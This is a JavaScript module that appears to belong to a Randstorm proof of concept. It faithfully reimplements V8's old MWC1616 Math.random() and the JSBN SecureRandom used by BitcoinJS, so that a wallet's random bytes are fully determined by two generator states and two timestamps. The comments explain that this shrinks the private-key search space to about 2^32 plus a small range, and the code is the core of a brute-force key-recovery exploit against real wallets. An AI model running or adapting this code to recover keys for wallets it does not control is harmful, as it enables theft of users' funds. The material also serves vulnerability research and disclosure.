import './prng4.mjs';

// V8 pre-49 Math.random() implementation (MWC1616).
// See https://github.com/v8/v8/blob/623cbdc5432713badc9fe1d605c585aabb25876c/src/js/math.js
// State is a pair of 32-bit integers (state0, state1). Multipliers are 18030 and 36969.
// The PoC searches over the (state0, state1) space, so the PRNG must be fully deterministic
// from those two values and must NOT touch the host Math.random().
class MWC1616 {
  constructor(state0, state1) {
    // Match V8 behaviour: zero seeds collapse the generator, so coerce to 1.
    this.s0 = (state0 | 0) || 1;
    this.s1 = (state1 | 0) || 1;
  }

  next() {
    // r0 = 18030 * (s0 & 0xFFFF) + (s0 >>> 16) | 0
    // r1 = 36969 * (s1 & 0xFFFF) + (s1 >>> 16) | 0
    var r0 = (Math.imul(18030, this.s0 & 0xFFFF) + (this.s0 >>> 16)) | 0;
    var r1 = (Math.imul(36969, this.s1 & 0xFFFF) + (this.s1 >>> 16)) | 0;
    this.s0 = r0;
    this.s1 = r1;
    var x = ((r0 << 16) + (r1 & 0xFFFF)) | 0;
    if (x < 0) x += 0x100000000;
    return x * 2.3283064365386962890625e-10; // x / 2^32
  }
}

globalThis.MWC1616 = MWC1616;

// SecureRandom faithful to JSBN's rng.js (the version shipped inside Bitcoinlib-JS).
// Construction:
//   1. Fill the 256-byte pool by calling Math.random() 128 times and splitting each
//      output into (high, low) bytes. We REPLACE Math.random() with an injected
//      MWC1616 instance so the pool is deterministic given (state0, state1).
//   2. rng_seed_time() XORs the constructor wall-clock time into the pool.
// First byte request:
//   3. rng_seed_time() XORs the first-request wall-clock time into the pool again.
//   4. RC4 (Arcfour) is keyed with the pool, the pool is then zeroed.
//   5. All subsequent bytes come from RC4.
//
// A wallet generated by this class is therefore fully determined by the tuple
// (state0, state1, t_construct, t_firstByte). Both timestamps come from the
// same wall clock and in practice differ by 0 or a few ms, which is why
// Randstorm reduces a 256-bit key to roughly 2^32 + small range.
class SecureRandom {
  constructor(seed) {
    // Allow several seed shapes to make the PoC ergonomic:
    //   undefined            -> non-deterministic (fallback to host Math.random)
    //   { state0, state1, tConstruct, tFirstByte }  -> fully deterministic
    //   { state0, state1, time }                    -> tConstruct = tFirstByte = time
    //   number                                      -> legacy: time only, MWC1616 disabled
    var s0, s1, tA, tB, useMwc;
    if (seed && typeof seed === 'object') {
      s0 = seed.state0 | 0;
      s1 = seed.state1 | 0;
      tA = (seed.tConstruct != null ? seed.tConstruct : seed.time) | 0;
      tB = (seed.tFirstByte  != null ? seed.tFirstByte  : seed.time) | 0;
      useMwc = (seed.state0 != null && seed.state1 != null);
    } else if (typeof seed === 'number') {
      tA = tB = seed | 0;
      useMwc = false;
    } else {
      tA = tB = Date.now() | 0;
      useMwc = false;
    }

    this._tConstruct = tA;
    this._tFirstByte = tB;
    this._mwc = useMwc ? new MWC1616(s0, s1) : null;

    // Step 1: fill pool from "Math.random()" (= our MWC1616 if seeded).
    this.rng_pool = new Array();
    this.rng_pptr = 0;
    var rand = this._mwc ? () => this._mwc.next() : Math.random;
    while (this.rng_pptr < rng_psize) {
      var t = Math.floor(65536 * rand());
      this.rng_pool[this.rng_pptr++] = t >>> 8;
      this.rng_pool[this.rng_pptr++] = t & 255;
    }
    this.rng_pptr = 0;

    // Step 2: mix in construction-time wall clock.
    this._mixTime(this._tConstruct);

    this.rng_state = null;
  }

  _mixTime(x) {
    this.rng_pool[this.rng_pptr++] ^= x & 255;
    this.rng_pool[this.rng_pptr++] ^= (x >> 8)  & 255;
    this.rng_pool[this.rng_pptr++] ^= (x >> 16) & 255;
    this.rng_pool[this.rng_pptr++] ^= (x >> 24) & 255;
    if (this.rng_pptr >= rng_psize) this.rng_pptr -= rng_psize;
  }

  rng_get_byte() {
    if (this.rng_state == null) {
      // Step 3: second time mix, just before RC4 keying.
      this._mixTime(this._tFirstByte);
      // Step 4: key RC4 with the pool, then zero the pool.
      this.rng_state = prng_newstate();
      this.rng_state.init(this.rng_pool);
      for (var i = 0; i < this.rng_pool.length; ++i) this.rng_pool[i] = 0;
      this.rng_pptr = 0;
    }
    return this.rng_state.next();
  }

  rng_get_bytes(ba) {
    for (var i = 0; i < ba.length; ++i) ba[i] = this.rng_get_byte();
  }

  nextBytes(ba) { return this.rng_get_bytes(ba); }
}

globalThis.SecureRandom = SecureRandom;
